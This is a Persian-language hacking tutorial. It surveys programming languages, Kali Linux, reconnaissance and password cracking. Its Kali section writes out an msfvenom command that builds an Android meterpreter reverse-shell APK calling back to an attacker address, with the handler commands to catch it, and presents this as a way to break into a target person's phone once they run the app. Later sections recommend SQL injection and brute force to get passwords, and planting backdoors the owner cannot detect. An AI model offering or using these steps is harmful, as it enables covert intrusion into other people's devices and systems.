آموزش برنامه نویسی هک و امنیت شبکه و سیستم های مختلف

زبان Python

یکی از محبوب ترین زبان های برنامه نویسی برای هک میان متخصصان این زمینه، زبان پایتون می باشد. دلیل این محبوبیت وجود کتابخانه های متنوع جهت ساخت برنامه های هک می باشد که کار را برای هکرها و متخصصان امنیت بسیار راحت تر می کند.

زبان پایتون نزدیک به زبان انسان است و یک زبان برنامه نویسی سطح بالا به حساب می آید. اسکریپت هایی که به وسیله پایتون نوشته می شوند، توانایی اجرا بدون نیاز به کامپایل شدن را نیز دارند. پایتون یک زبان برنامه نویسی متن باز می باشد و همچنین مبتنی بر شی گرایی نیز هست.

زبان  Java

یکی دیگر از زبان هایی که در آموزش برنامه نویسی هک گفته می شود ، زبان جاوا می باشد. این زبان دارای خاصیت جادویی اجرا روی پلتفرم می باشد که آن را از دیگر زبان ها متمایز ساخته است. زبان جاوا با شعار “یک بار بنویس و همه جا اجرا کن!“ ساخته شده و همه جا نیز با همین شعار شناخته می شود. این شعار به معنی این است که اغلب پلتفروم های معروفف می توانند کد های جاوا را اجرا کنند. جاوا یکی از بهترین زبان ها برای ساخت اپلیکیشن های اندرویدی نیز می باشد.

زبان PHP

برای متخصصان و کارشناسان هک و امنیت php یک زبان شناخته شده می باشد. این زبان برای متخصصان وب نویسی نیز بسیار کاربردی می باشد. یادگیری این زبان برای اینکه بدانید درخواست های POST و GET چگونه عمل می کنند بسیار کاربردی می باشد. در واقع کاربرد اصلی PHP برای هک و ورود به وبسایت ها می باشد.

زبان HTML و JavaScript

در بین زبان هایی که برای آموزش برنامه نویسی هک گفته می شود، نمی توان از جاوا اسکریپت صحبت کرد اما به HTML اشاره نکرد. هسته اولیه وب نویسی همین دو زبان برنامه نویسی می باشند. هر فردی که بخواهد در زمینه طراحی صفحات وب فعالیت داشته باشد و مهارت کسب کند ابتدا باید زبان پایه HTML را به طور کامل بشناسد. بعد از یادگیری HTML، یادگیری JavaScript نیز آغاز می شود که یک زبان سمت کلاینت است.

زبان پرس و جوی SQL

با یادگیری زبان برنامه نویسی SQL می توانید بفهمید که اطلاعات و داده ها در پایگاه داده چگونه ذخیره مشوند. با یادگیری این زبان آموزش برنامه نویسی هک کامل می شود. همانطور که می دانید در دنیای امروز اطلاعات مهمترین دارایی هر فرد یا سازمانی محسوب می شود که این اطلاعات نیز نیازمند مراقبت می باشند. کلیه سایت ها و سرویس های تحت وب، اطلاعات و داده های خود را در دیتابیس مخصوص به خود ذخیره می کنند. این دیتابیس ها اغلب با زبان SQL  کار می کنند. با یادگیری این زبان می توانید از ساز و کار خواندن و نوشتن اطلاعات آگاهی کسب کنید و مفهوم جداول و ارتباط آن ها را با یکدیگر درک کنید.

مرحله دوم: لینوکس را بشناسید و آن را فرا بگیرید

در مطالب پیشین چندین بار درباره سیستم عامل لینوکس و کالی لینوکس صحبت کرده ایم. همانطور که می دانید کالی لینوکس یکی از نسخه های قدرتمند سیستم عامل لینوکس است که به منظور هک و تست نفوذ طراحی و ارائه شده است. وقتی از کالی لینوکس استفاده می‌کنید می‌توانید به حجم وسیعی از ابزارهای قدرتمند برای انجام هک و نفوذ دسترسی داشته باشید.

کالی لینوکس به دلیل برخوردار بودن از خط فرمان قدرتمند می‌تواند بسیاری از کارها را به صورت خودکار برای شما انجام دهد.

در ادامه یکی از مواردی که می توانید به عنوان یک هکر از کالی لینوکس استفاده کنید و به دستگاه هوشمند شخص مورد نظر نفوذ کنید را آموزش خواهیم داد.

هک با کالی لینوکس

تا به اینجا به طور کامل با سیستم عامل کالی لینوکس آشنا شدید، حال وقت آن است که روش انجام هک با کالی لینوکس را نیز فرابگیرید. برای هک با کالی لینوکس مراحلی که در ادامه خواهیم گفت را به ترتیب انجام دهید تا موفق به هک با کالی لینوکس این سیستم قدرتمند شوید.

ابتدا نسخه کالی لینوکس را روی سیستم خود نصب نمایید. پس از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کنید. با استفاده از این ابزار، اقدام به ساخت یک برنامه هک اندروید به صورت APK نمایید. برای ساخت چنین ابزاری تنها نیاز دارید که دستور زیر را در محیط ترمینال لینوکس وارد نمایید.

<msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection).<Name.apk<==

در دستور فوق به جای عبارت LHOST می توانید از آدرس آی پی خودتان و در قسمت LPORT از پورت اینترنت خودتان استفاده کنید. Name.apk نام ابزاری است که شما به عنوان هکر آن را می سازید تا با آن اقدام به هک نمایید.

سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :

• Msf>use exploit/multi/handler
• Msf>set PAYLOAD android/meterpreter/reverse_tcp
• Msf>set LHOST 192.168.1.35
• Msf>set LPORT 443

البته این بار در قسمت LHOST نیاز است که آدرس سرور را وارد کنید. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود و شما به خواسته خود رسیده اید.

حالا وقتی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک کند و آن را اجرا کند، عملیات هک با کالی لینوکس موفقیت آمیز انجام می شود. همانطور که می بینید در این روش هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک نماید.

بازدید:

مرحله سوم: یاد گیری مفاهیم شبکه

بسیاری از متخصصین هک و امنیت آشنایی چندانی با شبکه ندارند، اما اگر شما می خواهید یکی از متخصصین حرفه ای باشید می بایست شبکه را به درستی و به صورت مفهومی فرا بگیرید. چرا که اگر با مفهوم شبکه آشنا نباشید از حجم وسیع آسیب پذیری‌های موجود در شبکه‌ها محروم می‌شوید.

فراگیری شبکه نیازمند یادگیری اصطلاحات و استانداردهای موجود و توانایی در پیاده سازی شبکه‌های مختلف می باشد.

برای یادگیری شبکه می‌توانید با دوره‌ها و کتاب‌های network+ آغاز کنید.

مرحله چهارم: انتخاب هدف و جمع آوری اطلاعات

در انتخاب هدف های خود دقت کنید و هیچ وقت عملی غیر قانونی انجام ندهید، چرا که هرقدر هم شما در این زمینه متخصص باشید باز هم مقامات امنیتی و متخصصان پلیس به دلیل سطح دانش بالایی که دارند می توانند شما را دستگیر کنند.

برای تمرین عمل هک و یادگیری بهتر در این زمینه می توانید خود را هک کنید. به این صورت که یک سرور مجازی برای خود ایجاد کنید و سعی کنید به آن نفوذ نمایید.

همچنین می توانید از سایت‌های آسیب پذیر که برای تمرین در اختیار دانش پذیران امنیت قرار گرفته اند، استفاده کنید.

وقتی هدف خود را انتخاب نمودید، باید عملیات جمع آوری اطلاعات را شروع کنید، در این مرحله هر اطلاعاتی مفید است از جمله:

• موقعیت مکانی و زمانی هدف
• زبان رسمی مورد استفاده توسط متخصص پیاده کننده سرویس
• سیستم عامل و سرویس‌هایی که روی سیستم عامل پیاده شده است
• سعی در تشخیص فایروال و تمهیدات امنیتی سیستم
• تکنولوژی‌های مورد استفاده
• بررسی مشکلات امنیتی موجود در سیستم با استفاده از ابزارهای مختلف
• بررسی مسائل مرتبط با شبکه از جمله تعداد IP و پورت‌های باز موجود در سیستم

مرحله پنجم: تلاش برای شکستن رمز ها

همانطور که می دانید برای ورود به اکثر سیستم ها و شبکه ها باید پسورد آن را در اختیار داشته باشیم. برای این منظور با نفوذ پذیری SQL Injection می‌توانید یک Hash از کلمه عبور را بیابید که با کمک تکنیک‌های کرک کردن عبارات هش شده می توانید به رمز عبور سیستم دست پیدا کنید.

علاوه بر این راهکارهای دیگری نظیر burtforce وجود دارند که با استفاده از آنها می‌توانید حجم وسیعی از کلمه‌های عبور را بر روی فرم ورود تست کرده و به کلمه عبور صحیح دسترسی پیدا کنید.

مرحله ششم: ساخت در پشتی و یا BackDoor برای حفظ دسترسی

در برخی موارد ممکن است با در اختیار داشتن رمز عبور سیستم موردنظر، بتوانید وارد آن شوید، اما اگر بعد از چند روز رمز عبور توسط صاحب سیستم عوض شود، دسترسی شما نیز قطع می شود و دیگر نمی توانید وارد سیستم شوید.

از همین رو بعد از هر نفوذی باید سعی کنید یک در پشتی و یا BackDoor در سیستم ایجاد کنید.

درهای پشتی بستگی به نوع سیستمی که به آن نفوذ کردید دارد و با توجه به نوع سیستم می‌توانند پیچیده و یا ساده باشند. اکیدا درهای پشتی باید به گونه‌ای اضافه شوند که صاحب سیستم نتواند به ماهیت و نفوذ شما پی ببرد.